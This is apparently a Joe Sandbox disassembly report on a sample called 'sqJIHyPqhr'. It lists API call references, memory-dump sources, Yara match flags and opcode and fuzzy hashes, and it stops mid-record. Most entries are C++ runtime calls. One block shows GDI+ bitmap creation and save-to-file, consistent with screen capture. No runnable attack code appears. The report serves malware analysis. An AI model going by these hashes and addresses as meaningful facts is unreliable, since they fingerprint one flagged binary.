                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024A4FCA
                                                                      • int.LIBCPMT ref: 024A4FE1
                                                                        • Part of subcall function 024ABFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024ABFD4
                                                                        • Part of subcall function 024ABFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024ABFEE
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024A4FEA
                                                                      • std::_Facet_Register.LIBCPMT ref: 024A501B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024A5031
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A504F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                      • Instruction ID: 3b9cd9609575d1334d102860065d3b3d44fd1909408e73f48122298cfe8b212e
                                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                      • Instruction Fuzzy Hash: CE11C231D042289BCB25EB65D961AEE7776BF24314F54011FE422AB2D0DB749A05CFD0
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                      • int.LIBCPMT ref: 00404D7A
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                      • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                      • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                      • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024AC401
                                                                      • int.LIBCPMT ref: 024AC418
                                                                        • Part of subcall function 024ABFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024ABFD4
                                                                        • Part of subcall function 024ABFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024ABFEE
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024AC421
                                                                      • std::_Facet_Register.LIBCPMT ref: 024AC452
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024AC468
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024AC486
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                      • Instruction ID: 20e1128c0867f5c62e9d78edd7923c1678400782dbfb64bd7c718edfca18cc91
                                                                      • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                      • Instruction Fuzzy Hash: BA11E1719002289BCF15EBA5C8A4AEE7B72AF64714F24011FE811BB2D0DF748A01CFA4
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024A4E8C
                                                                      • int.LIBCPMT ref: 024A4EA3
                                                                        • Part of subcall function 024ABFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024ABFD4
                                                                        • Part of subcall function 024ABFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024ABFEE
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024A4EAC
                                                                      • std::_Facet_Register.LIBCPMT ref: 024A4EDD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024A4EF3
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024A4F11
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                      • Instruction ID: cf759c499c4f0c228f308d2f18619557dc26861689fdf22d3f35e1acf6c2dded
                                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                      • Instruction Fuzzy Hash: C711AC319002299BCB15EBA5D860AEF7772AF64314F24011FE811A72D0DBB49A01CFA0
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                      • int.LIBCPMT ref: 0040C1B1
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                      • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                      • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                      • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                      • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                      • int.LIBCPMT ref: 004054FA
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                      • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                      • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                      • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                      • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                      • int.LIBCPMT ref: 00405596
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                      • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                      • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                      • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                      • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                      • int.LIBCPMT ref: 00404C3C
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                      • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                      • String ID:
                                                                      • API String ID: 2243866535-0
                                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                      • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                      • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                      • __Getcoll.LIBCPMT ref: 00404EC4
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                      • String ID: fJ@
                                                                      • API String ID: 1836011271-3478227103
                                                                      • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                      • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                      • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                      • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                      • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                      • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                      • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                      APIs
                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                      • String ID: pScheduler
                                                                      • API String ID: 3657713681-923244539
                                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                      • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                      • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog3_catchmake_shared
                                                                      • String ID: MOC$RCC$v)D
                                                                      • API String ID: 3472968176-3108830043
                                                                      • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                      • Instruction ID: 7abdc0f25e0cdd37e78411f15ae8cdbdec104073270d2ba0228812cd8e135fe8
                                                                      • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                      • Instruction Fuzzy Hash: 88F0C2B4A00214EFEF1AFF69C00066D3765BF61B01F46909BF4016B360CBB88988CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                      • Instruction ID: 3ae09daaeae43522914bdc4077791c9a9ffbc241102ee4553dc493e6e69faa0c
                                                                      • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                      • Instruction Fuzzy Hash: 5D71B239E002169BCB618F9DC886ABFBB75EF5531CF34426FE41157280DB708942CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                      • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                      • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                      • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 3033488037-0
                                                                      • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                      • Instruction ID: 3a202983dff21fc983d364a95c4abf64c7aec59458cd5694cbdd92aab9228a26
                                                                      • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                      • Instruction Fuzzy Hash: EE518F71A00304AFDB21DF2AD851BABB7F5EB49724F14166FE849D7250E732E901CB90
                                                                      APIs
                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                      • _free.LIBCMT ref: 00430B4F
                                                                      • _free.LIBCMT ref: 00430B66
                                                                      • _free.LIBCMT ref: 00430B85
                                                                      • _free.LIBCMT ref: 00430BA0
                                                                      • _free.LIBCMT ref: 00430BB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 3033488037-0
                                                                      • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                      • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                      • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                      • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                      • Instruction ID: 7d25a92a1786074f515879a5527539b43b381cfad3f68e5ea94a7a4adf3cb950
                                                                      • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                      • Instruction Fuzzy Hash: 6341D036A003049FCB24DF79C990A9EB7F6EF89714B1545AEE919EB391D731E901CB80
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                      • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                      • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                      • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                      • __alloca_probe_16.LIBCMT ref: 00436922
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                      • __freea.LIBCMT ref: 0043698E
                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                      • String ID:
                                                                      • API String ID: 313313983-0
                                                                      • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                      • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                      • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                      • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                      APIs
                                                                      • _SpinWait.LIBCONCRT ref: 024BB152
                                                                        • Part of subcall function 024B1188: _SpinWait.LIBCONCRT ref: 024B11A0
                                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024BB166
                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024BB198
                                                                      • List.LIBCMT ref: 024BB21B
                                                                      • List.LIBCMT ref: 024BB22A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                      • String ID:
                                                                      • API String ID: 3281396844-0
                                                                      • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                      • Instruction ID: 314aa170d5811cf34a7880d1573550a53ea6273139738289f04e41c1c01b4215
                                                                      • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                      • Instruction Fuzzy Hash: DE314432E00616DFCB16EFA5C9906EEBBB2FF04348B04406FC8156B641CB716A04CFA0
                                                                      APIs
                                                                      • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                        • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                      • List.LIBCMT ref: 0041AFB4
                                                                      • List.LIBCMT ref: 0041AFC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                      • String ID:
                                                                      • API String ID: 3281396844-0
                                                                      • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                      • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                      • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                      • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                      APIs
                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                      • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                      • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                      • String ID:
                                                                      • API String ID: 2357751836-0
                                                                      • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                      • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
